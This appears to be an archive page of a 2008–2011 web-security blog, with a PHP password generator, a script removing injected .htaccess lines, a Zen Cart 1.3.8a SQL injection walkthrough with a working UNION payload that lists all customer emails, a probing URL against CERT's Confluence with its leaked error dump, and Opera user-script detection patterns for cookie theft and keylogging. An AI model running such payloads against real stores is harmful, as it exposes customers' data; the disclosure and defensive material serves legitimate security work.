Web Security

Generate unbreakable passwords from php

Sunday, February 13th, 2011 | Web Security | Comments Off

This is a short post to share my favorite way of generating strong passwords in php.

The advantage over other functions you’ll find over the internet is that it makes sure it uses all the character sets also making sure no character will repeat in the final password.

This outcome of the script is similar with what is generated in cpanel when creating new accounts/emails.

function generatePassword($length=12){
   $validchars = array();
   $validchars[] = "0123456789";
   $validchars[] = "abcdfghjkmnpqrstvwxyz";
   $validchars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
   $validchars[] = "_!@#$%&*()-=+/";
 
   $password  = "";
   $counter   = 0;
 
   shuffle($validchars);
   while ($counter < $length) {
	   foreach($validchars as $rand_key => $pool) {
			//every letter is different
			do {
				$actChar = substr($pool, rand(0, strlen($pool)-1), 1);
				if(!strstr($password, $actChar)) break;
			} while (1==1);
			$password .= $actChar;
			$counter++;
	   }
	   reset($validchars);
   }
   return $password;
}
 
echo generatePassword();

fix for an iframe injection attack

Tuesday, January 25th, 2011 | Web Security | Comments Off

more and more people, including some of my clients get attack by various versions of iframe injections.

One of them, includes injecting a php file inside the host. after that, by various means, in all the htaccess files it’s injected a code similar with:

AddType application/x-httpd-php .php .phtml .php3 .php4 .php5 .htm .html
php_value auto_prepend_file /path/xxxx_atacking_file_which_has_php_code

now to remove that code from each htaccess file use the following php code:

function r_fix($dir='.') {
	if ($handle = opendir($dir)) {
		while (false !== ($file = readdir($handle))) {
            if (is_dir("$dir/$file")) {
                if ($file != '.' && $file != '..') {
                    r_fix("$dir/$file");
                    //chdir($dir);
                }
            } elseif ($file=='.htaccess'){
				$path = $dir . '/' . $file;
				$contents = file_get_contents($path);
				if(strpos($contents, 'xxxx_atacking_file_which_has_php_code') !== false) {
					$contents = str_replace('AddType application/x-httpd-php .php .phtml .php3 .php4 .php5 .htm .html', '', $contents);
					$contents = str_replace('php_value auto_prepend_file /path/xxxx_atacking_file_which_has_php_code', '', $contents);
					echo $path." <br>\n ";flush();
					file_put_contents($path, $contents);					
				}
			}
		}
		closedir($handle);
	}
}
 
r_fix();

Microsoft RDP.

Monday, November 10th, 2008 | Web Security | Comments Off


source: OWASP News

ZenCart 1.3.8a SQL Injection

Friday, November 7th, 2008 | Web Security | Comments Off

Unfortunately an sql injection vulnerability was discovered in Zencart v.1.3.8a

In order to test it please follow some simple steps:
1. go to the product listing page by clicking a category

2. save the page on your pc, open it in a text editor and modify (assuming there is a product with the id 111 or whatever….)

<input name=”products_id[111]” size=”4″ type=”text” value=”0″ />
to
<input name=”products_id[-1' union select GROUP_CONCAT(customers_email_address), 2 from customers/*] ” size=”4″ type=”text” value=”0″ />

3. submit the form by adding at least one product to cart for the modified input box.

The result will be that a comma separated list of all customer emails will be shown.

In order to protect against this attack you can apply the following security patch:

http://www.zen-cart.com/forum/showthread.php?p=604473

Tags: ,

Covert Manipulation.

Friday, October 31st, 2008 | Web Security | Comments Off

I've been interested in communication for a long time, and I am especially interested in the use of language for persuasion. Once you know how powerful words really are, you'll start using them with care. The conscious mind behaves in patterns and that those patterns can be broken. It's also possible to embed hidden commands inside language in order to trigger a response from someone. In fact, you can break the thought pattern of someone and replace it with yours. This can be easily proven. You read my words I typed here, they entered your mind in both a consciousness and unconsciousness way. I transferred my thoughts into your thoughts, unconsciously I might have given new instructions to change your feeling or ideas about something in a covert way. You are probably aware of this already, because certain words make you feel different than other words. Hacking the mind through covert manipulation is easier than you might have thought. Ask yourself, what impression did I gave just now? what did I change you weren't aware of before reading this text? Which thoughts are yours and which were mine? and how will they affect the rest of your day?

source: OWASP News

Oscommerce Sql Injection

Sunday, October 26th, 2008 | Web Security | 1 Comment

WARNING: Do not use any kind of information found here to harm websites, business, people lives etc…
The unauthorized usage of the aforementioned methods could lead to legal prosecution and severe penalties.

Ever wanted to check how an sql injection might work with an oscommerce store?
› Continue reading

Tags: , ,

Secure Coding And Cocktail Parties.

Saturday, October 25th, 2008 | Web Security | Comments Off

I am going to be very clear about his today. In the past I posted vulnerabilities in many websites including websites from companies who say they secure web applications, or store web application vulnerabilities and even those who give out certifications like (ISC)2, and I left out those who talk about application security while using insecure software packages to speak about it, because yeah, it's not their fault is it? What does that say about them? Well, for starters it's the same thing like having a police officer committing a crime. It's about time for some introspective analysis for each and everyone in the web application security field before this stuff get's further out of control. No wonder no one takes web application security and it's experts serious, look at the mess around you and your application security vendor who fails to secure himself. So when I see the secure coding group from cert talk about secure coding standards[1] I get really disappointed when they are vulnerable themselves. It's not like we are dealing with a space mission to Mars for example, it's just web application security for fuck sake! something that can be explained to any 5th grader on four sheets of paper.

Judge for yourself, always useful to gain some extra SQL practice in real life:

https://www.securecoding.cert.org/confluence/dosearchsite.action?queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=

A system error has occurred � our apologies!

Please ask your Confluence administrator to create a support issue on Atlassian's support system at http://support.atlassian.com with the following information:

 1. a description of your problem and what you were doing at the time it occurred 2. a copy of the error and system information found below 3. a copy of the application logs (if possible).

Your Confluence administrator can use the support request form to create a support ticket which will include this information.

We will respond as promptly as possible.
Thank you!

Return to site homepage�
Cause

java.lang.IllegalArgumentException: Invalid search query found in specified search. at com.atlassian.confluence.search.v2.lucene.LuceneSearchManager.search(LuceneSearchManager.java:74)

caused by: java.lang.IllegalArgumentException: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:46)

caused by: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at org.apache.lucene.queryParser.QueryParser.parse(QueryParser.java:153)
Stack Trace:[hide]

java.lang.IllegalArgumentException: Invalid search query found in specified search. at com.atlassian.confluence.search.v2.lucene.LuceneSearchManager.search(LuceneSearchManager.java:74) at com.atlassian.confluence.search.actions.SearchSiteAction.exactUsernameSearch(SearchSiteAction.java:286) at com.atlassian.confluence.search.actions.SearchSiteAction.getContributors(SearchSiteAction.java:237) at com.atlassian.confluence.search.actions.SearchSiteAction.validate(SearchSiteAction.java:158) at com.opensymphony.xwork.interceptor.DefaultWorkflowInterceptor.intercept(DefaultWorkflowInterceptor.java:44) at com.atlassian.confluence.core.ConfluenceWorkflowInterceptor.intercept(ConfluenceWorkflowInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.interceptors.CaptchaInterceptor.intercept(CaptchaInterceptor.java:46) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.util.LoggingContextInterceptor.intercept(LoggingContextInterceptor.java:48) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.CancellingInterceptor.intercept(CancellingInterceptor.java:23) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.actions.PermissionCheckInterceptor.intercept(PermissionCheckInterceptor.java:54) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.pages.actions.CommentAwareInterceptor.intercept(CommentAwareInterceptor.java:43) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.pages.actions.PageAwareInterceptor.intercept(PageAwareInterceptor.java:120) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.spaces.actions.SpaceAwareInterceptor.intercept(SpaceAwareInterceptor.java:67) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:39) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:25) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:97) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115) at com.opensymphony.webwork.dispatcher.ServletDispatcher.serviceAction(ServletDispatcher.java:229) at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199) at javax.servlet.http.HttpServlet.service(HttpServlet.java:803) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:118) at com.atlassian.confluence.util.profiling.ProfilingPageFilter.parsePage(ProfilingPageFilter.java:153) at com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:54) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.jmx.JmxFilter.doFilter(JmxFilter.java:109) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.core.filters.ServletContextThreadLocalFilter.doFilter(ServletContextThreadLocalFilter.java:21) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.LoggingContextFilter.doFilter(LoggingContextFilter.java:49) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.UserThreadLocalFilter.doFilter(UserThreadLocalFilter.java:44) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.seraph.filter.SecurityFilter.doFilter(SecurityFilter.java:192) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.seraph.filter.TrustedApplicationsFilter.doFilter(TrustedApplicationsFilter.java:120) at com.atlassian.confluence.util.AbstractBootstrapHotSwappingFilter.doFilter(AbstractBootstrapHotSwappingFilter.java:28) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.seraph.filter.BaseLoginFilter.doFilter(BaseLoginFilter.java:125) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.ClusterHeaderFilter.doFilter(ClusterHeaderFilter.java:35) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.johnson.filters.AbstractJohnsonFilter.doFilter(AbstractJohnsonFilter.java:72) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.springframework.orm.hibernate.support.OpenSessionInViewFilter.doFilterInternal(OpenSessionInViewFilter.java:170) at com.atlassian.spring.filter.FlushingSpringSessionInViewFilter.doFilterInternal(FlushingSpringSessionInViewFilter.java:29) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:75) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.util.profiling.filters.ProfilingFilter.doFilter(ProfilingFilter.java:142) at com.atlassian.core.filters.ProfilingAndErrorFilter.doFilter(ProfilingAndErrorFilter.java:27) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.core.datetime.RequestTimeThreadLocalFilter.doFilter(RequestTimeThreadLocalFilter.java:34) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.RequestCacheThreadLocalFilter.doFilter(RequestCacheThreadLocalFilter.java:25) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.gzipfilter.GzipFilter.doFilterInternal(GzipFilter.java:94) at com.atlassian.gzipfilter.GzipFilter.doFilter(GzipFilter.java:64) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.core.filters.AbstractEncodingFilter.doFilter(AbstractEncodingFilter.java:33) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.valves.FastCommonAccessLogValve.invoke(FastCommonAccessLogValve.java:482) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:174) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:595)
Caused by: java.lang.IllegalArgumentException: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:46) at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:15) at com.atlassian.confluence.search.v2.lucene.DelegatingLuceneSearchMapper.convertToLuceneQuery(DelegatingLuceneSearchMapper.java:30) at com.atlassian.confluence.search.v2.lucene.mapper.BooleanQueryMapper.addSubQueries(BooleanQueryMapper.java:43) at com.atlassian.confluence.search.v2.lucene.mapper.BooleanQueryMapper.convertToLuceneQuery(BooleanQueryMapper.java:29) at com.atlassian.confluence.search.v2.lucene.DelegatingLuceneSearchMapper.convertToLuceneQuery(DelegatingLuceneSearchMapper.java:30) at com.atlassian.confluence.search.v2.lucene.LuceneSearchManager.search(LuceneSearchManager.java:52) ... 113 more
Caused by: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at org.apache.lucene.queryParser.QueryParser.parse(QueryParser.java:153) at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:42) ... 119 more

Referer URL

Unknown
Confluence Application Information
Build Information

buildNumber: 1418
upTime: 2 days, 2 hours, 12 minutes, 11 seconds
devMode: false
version: 2.9.1
home: /var/lib/confluence
Unique ID: 0x0000011D5EDA2F53458D112A3234C9F2472F5C45C3AF54AE9C867DF600E1355
Server information

Application Server: Apache Tomcat/5.5.26
Servlet Version: 2.4
Database Dialect: com.atlassian.hibernate.dialect.MySQLDialect
Database Driver Name: com.mysql.jdbc.Driver
Database Driver Version: 5.0
Database Name: MySQL
Database Version: 4.1.22
Database Transaction Isolation: Repeatable read Database Latency: 0
Memory Information

Total Memory: 1016 MB
Used Memory: 913 MB
Free Memory: 103 MB
System Information

userName: tomcat
favouriteColour: Sangria
time: 08:05:12
javaVm: Java HotSpot(TM) Client VM
operatingSystemArchitecture: i386
date: Friday, 24 Oct 2008
operatingSystem: Linux 2.6.9-78.0.1.ELsmp
jvmVersion: 1.0
userTimezone: US/Eastern
fileSystemEncoding: UTF-8
jvmImplementationVersion: 1.5.0_16-b02
appServer: Apache Tomcat
javaVendor: Sun Microsystems Inc.
javaVersion: 1.5.0_16
javaRuntime: Java(TM) 2 Runtime Environment, Standard Edition
jvmVendor: Sun Microsystems Inc.
Cluster Information

Not clustered.
Plugins

 * Add Content Menu Sections (confluence.menu.add, Version: 1.0) * Admin Sections (confluence.sections.admin, Version: 1.0) * Advanced Macros (confluence.macros.advanced, Version: 1.4.2) * Attachment Actions (confluence.sections.attachments, Version: 1.0) * Attachment Extractors (com.atlassian.confluence.plugins.attachmentExtractors, Version: 1.0-SNAPSHOT) * Basic Macros (confluence.macros.basic, Version: 1.4) * Browse Menu Items (confluence.sections.browse, Version: 1.0) * Chart Plugin (confluence.extra.chart, Version: 1.11) * Clickr Theme (com.atlassian.confluence.themes.clickr, Version: 2.2) * Code Macro (confluence.macros.code, Version: 1.5) * Comment Action Sections (confluence.comment.action, Version: 1.0) * Confluence Atlassian Plugin Repository (confluence.repository.client, Version: 2.0.15) * Confluence Attachments Plugin (confluence.extra.attachments, Version: 2.10) * Confluence Classic Theme (com.atlassian.confluence.themes.classic, Version: 2.0) * Confluence Contributors Plugin (com.atlassian.confluence.contributors, Version: 1.2) * Confluence Usage Stats (com.atlassian.confluence.ext.usage, Version: 0.8) * Content Action Menu Sections (confluence.content.action.menu, Version: 1.0) * Content Buttons (confluence.sections.page.temp, Version: 1.0) * Core Extractors (confluence.extractors.core, Version: 1.4) * Core Listeners (confluence.listeners.core, Version: 1.3) * Core Path Converters (confluence.converters.core, Version: 1.0) * Core Startup and Shutdown (confluence.lifecycle.core, Version: 1) * Dashboard Macros (confluence.macros.dashboard, Version: 1.4.2) * Default Theme (com.atlassian.confluence.themes.default, Version: 1.0) * Dynamic Task List 2 Plugin (confluence.extra.dynamictasklist2, Version: 3.0.6) * Edit Profile Sections (confluence.sections.profile.edit, Version: 1.0) * French language pack (confluence.languages.fr_FR, Version: 1.8) * German language pack (confluence.languages.de_DE, Version: 1.3) * Global Labels Sections (confluence.sections.labels, Version: 1.0) * Information Macros (confluence.extra.information, Version: 1.0) * Layout Macros (confluence.extra.layout, Version: 1.1) * Left Navigation Theme (com.atlassian.confluence.themes.leftnavigation, Version: 2.0) * Live Search Macros (confluence.extra.livesearch, Version: 2.8) * News Tabs (confluence.sections.news, Version: 1.0) * Page Operations (confluence.sections.page.operations, Version: 1.0) * Page Tabs (confluence.sections.page, Version: 1.0) * Page Tabs (confluence.search.mappers.lucene, Version: 1.0) * Page Tree (com.atlassian.confluence.plugins.pagetree, Version: 1.10) * Page View Links (confluence.sections.page.actions, Version: 1.0) * Profile Tabs (confluence.sections.profile, Version: 1.0) * Search Web Interface (confluence.sections.search.view, Version: 1.0) * Space Actions Sections (confluence.sections.space.actions, Version: 1.0) * Space Admin Sections (confluence.sections.space.admin, Version: 1.0) * Space Advanced Sections (confluence.sections.space.advanced, Version: 1.0) * Space Browse Sections (confluence.sections.space.browse, Version: 1.0) * Space Item Tabs (confluence.sections.space, Version: 1.0) * Space Labels Sections (confluence.sections.space.labels, Version: 1.0) * Space Pages Sections (confluence.sections.space.pages, Version: 1.0) * System Web Resources (confluence.web.resources, Version: 1.0) * Table of Contents Plugin (org.randombits.confluence.toc, Version: 2.4.8)

 * Tabular Metadata (confluence.extra.masterdetail, Version: 2.7) * TinyMCE Editor Plugin (com.atlassian.confluence.extra.tinymceplugin, Version: 3.0-rc2) * User Lister (confluence.extra.userlister, Version: 2.4) * User Menu Sections (confluence.user.menu, Version: 1.0) * View Profile Web Interface (confluence.sections.profile.view, Version: 1.0) * Wiki Renderer Components (confluence.renderer.components, Version: 1.0)

Request
Information

URL https://www.securecoding.cert.org/confluence/500page.jsp 
URI /confluence/500page.jsp 
Context Path /confluence
Servlet Path /500page.jsp
Query String queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=

Headers (Limited subset)

host www.securecoding.cert.org
user-agent Mozilla/1.0 (Windows; U; Windows NT 1.1; en-US; rv:2.9.0.3) Gecko/2002016217
keep-alive 300
connection keep-alive

Attributes

javax.servlet.forward.request_uri /confluence/dosearchsite.action
javax.servlet.forward.context_path /confluence
javax.servlet.forward.servlet_path /dosearchsite.action
javax.servlet.forward.path_info /500page.jsp
javax.servlet.forward.query_string queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=
javax.servlet.error.message
javax.servlet.error.exception java.lang.IllegalArgumentException: Invalid search query found in specified search.
os_securityfilter_already_filtered true
com.atlassian.johnson.filters.JohnsonFilter_already_filtered true
__sitemesh__using_stream false
javax.servlet.error.request_uri /confluence/dosearchsite.action
com.atlassian.gzipfilter.GzipFilter_already_filtered true
javax.servlet.error.status_code 500
__sitemesh__filterapplied true
javax.servlet.error.servlet_name action
webwork.valueStack com.opensymphony.xwork.util.OgnlValueStack@e2a5ac
Confluence-Request-Time 1224851735677
loginfilter.already.filtered true
atlassian.core.seraph.original.url /dosearchsite.action?queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=
javax.servlet.jsp.jspException java.lang.IllegalArgumentException: Invalid search query found in specified search.
sessioninview.FILTERED true

Parameters (Limited subset)

queryString "> ">
contributorUsername
type
where conf_all
lastModified
contributor ">

Confluence User

anonymous

^ Oops, besides this hideous blob of intelligence it also let us modify the SQL query. Finally something really interesing to discuss at those cocktail parties or is it?

[1] https://www.securecoding.cert.org/confluence/display/seccode/CERT+Secure+Coding+Standards
source: OWASP News

The RPC Worm Victim List.

Saturday, October 25th, 2008 | Web Security | Comments Off

Opera Arioso Update.

Saturday, October 25th, 2008 | Web Security | Comments Off

I've made some updates on my Opera plugin to block and protect more attacks against Opera. Luckily there aren't that many attacks in comparison to other browsers, nonetheless I like to notice what happens on webpages I visit. The minor updates are based upon Gareth Heyes Unicode loop circumvention for Arioso's active heapspraying and buffer overflow detection, setPreference and more strict opera: scheme blocking based upon Aviv Raff and Stefano Di Paola, Roberto Suggi Liverani's new proof of concepts. Arioso already did protect against the proof of concepts on hyperlinks, but lacked additional heuristics on sources. Please notice that Arioso does not block Javascript, instead it analyzes a document, it's Javascript and based on attack heuristics determines whether to block the scripts from executing before the page has a chance to load the scripts. Arioso also detects attacks against Internet Explorer and Firefox, while this does not affect Opera, it's always nice to know that the page in question tries to execute an attack against you. One key feature in Arioso is the possibility in using Opera with a very strict same origin policy, this is and was enabled by default, and denies any cross context sourcing from Javascript files. This means that any script content that is loaded from another context than you are in, will be blocked by default.

You can download the new version of Arioso here: http://www.0×000000.com/arioso.js

The Arioso source can be loaded into Opera. To enable user JavaScript, use Tools > Preferences > Advanced > Content > JavaScript options, and select the directory where you will put your User JavaScript files. Opera will load all files in the specified directory whose names end with .js and will use them as User JavaScript files. Use Opera with Arioso, and you'll be more secure than any other browser available right now.

(function(opera){

/*

 ~~~ Opera Arioso! ~~~  Active browser vulnerability detection & protection by rvdh, 0x000000.com

 $revisions$ update: 20/7/2008: 7:15 PM, keylog pattern adjusted. update: 22/10/2008: 23:00 PM, unicode loop detection.  update: 23/10/2008: 4:19 PM, blocks opera:* on sources, blocks intranet access. credits: Rvdh, Gareth Heyes, Roberto Suggi Liverani, Aviv Raff, Stefano Di Paola

*/

// Arioso magic variables
window.opera.defineMagicVariable('arioso_links', function() {}, null);
window.opera.defineMagicVariable('arioso_alert', function() {}, null);

// Set strict same origin policy:
var arioso_strict_sop = true;

// Arioso variables
var arioso_links = document.links;
var arioso_alert = "";
var crlf = ". \r\n";

// Arioso messages
var m1 = 'Unsafe URI hyperlink schemes';
var m2 = 'Denial of service vector';
var m3 = 'Heapspraying or denial of service vector';
var m4 = 'VBInjection';
var m5 = 'Cookie stealing';
var m6 = 'Same origin policy violation';
var m7 = 'Keylogging';
var m8 = 'Script access';
var m9 = 'ActiveX access';
var m10 = 'Java access';
var m11 = 'Http response splitting';
var m12 = 'Preference hijacking';

// Arioso patterns
var p1 = /^(chrome|file|opera|res|data|telnet|about|resource|view-source|acrobat|localhost|loopback|127\.|192\.)\s*(:|\.)/gim;
var p2 = /for\s*\(\s*.*([a-z]|[0-9])\s*\=\s*.*([a-z]|[0-9])\s*;\s*.*([a-z]|[0-9])\s*(<|>|<=|>=|<==|>==)\s*[0-9]{3,}\s*;\s*/gim;
var p3 = /(while|for|space|block|memory).*unescape\(("|')(%[0-9]|\\x|\\u)([a-z]|[0-9])("|')\)/gim;
var p4 = /String\(\s*.*([a-z]|[0-9]){6,},\s*"[a-z]"\)/gim;
var p5 = /(http|https):\/\/.*\?.*=.*(\+|concat|join).*document\.(cookie|domain)/gim;
var p6 = /(src|href|location|data|classid|codebase|open)\s*(=|\().*(chrome|file|opera|res|data|telnet|about|resource|view-source|acrobat|localhost|loopback|127\.|192\.)\s*(:|\.)/gim;
var p7 = /(\.keyCode|\.keypress|(e|event)\.charCode)/gim;
var p8 = /(bad_arioso_schemes|arioso_links|arioso_schemes|arioso_sanitize_xss)/gim;
var p9 = /(ActiveXObject\(("|').*Shell("|')\)|HKEY\_)/gim;
var p10 = /(java\.(sun|awt)|packages\.(.*)(plugin|javascript))/gim;
var p11 = /open\(("|')\s*(GET|TRACE|POST)\s*("|').*(\\r|\\r\\n|\\n|(%[0-9]|\\x|\\u)([a-z]|[0-9])).*\)/gim;
var p12 = /.*opera\.setPreference.*/gim;

// strict same origin policy detection
if(arioso_strict_sop == true) { window.opera.addEventListener('BeforeExternalScript', function(e) { if (!e.element.getAttribute('src').match(document.location)) { e.preventDefault(); } }, false);
}

// Arioso link enumerator detecting bad uri schemes
window.addEventListener('DOMContentLoaded', function(e) { for (i = 0; i < arioso_links.length; i++) { entity = arioso_links[i].toString(); if (entity.match(p1)) { arioso_alert += m1; } }
}, false);

window.opera.addEventListener('BeforeScript', function(e) {

 if (e.element.text.match(p2)) { arioso_alert += m2 + crlf; e.preventDefault(); }  if (e.element.text.match(p3)) { arioso_alert += m3 + crlf; e.preventDefault(); }  if (e.element.text.match(p4)) { arioso_alert += m4 + crlf; e.preventDefault(); }  if (e.element.text.match(p5)) { arioso_alert += m5 + crlf; e.preventDefault(); } if (e.element.text.match(p6)) { arioso_alert += m6 + crlf; e.preventDefault(); } if (e.element.text.match(p7)) { arioso_alert += m7 + crlf; e.preventDefault(); } if (e.element.text.match(p8)) { arioso_alert += m8 + crlf; e.preventDefault(); } if (e.element.text.match(p9)) {  arioso_alert += m9 + crlf; e.preventDefault();  }	 if (e.element.text.match(p10)) { arioso_alert += m10 + crlf; e.preventDefault(); }	 if (e.element.text.match(p11)) { arioso_alert += m11 + crlf; e.preventDefault(); }	 if (e.element.text.match(p12)) { arioso_alert += m12 + crlf; e.preventDefault(); }	

}, false);

document.addEventListener('load', function(e) {

 if (arioso_alert != '' ) { var ary = document.createElement('div'); ary.style.position = 'fixed'; ary.style.top = '0px'; ary.style.left = '0px'; ary.style.width = '100%'; ary.style.opacity = '.90'; ary.style.filter = 'alpha(opacity=90)'; ary.style.border = '1px dotted #f30'; ary.style.padding = '3px'; ary.style.font = '8pt sans-serif'; ary.style.backgroundColor = '#f00'; ary.style.color = '#fff'; ary.appendChild(document.createTextNode('ARIOSO BLOCKED: ' + arioso_alert)) document.body.appendChild(ary); } 

}, false);

})(window.opera);

source: OWASP News

Disable RPC.

Saturday, October 25th, 2008 | Web Security | Comments Off

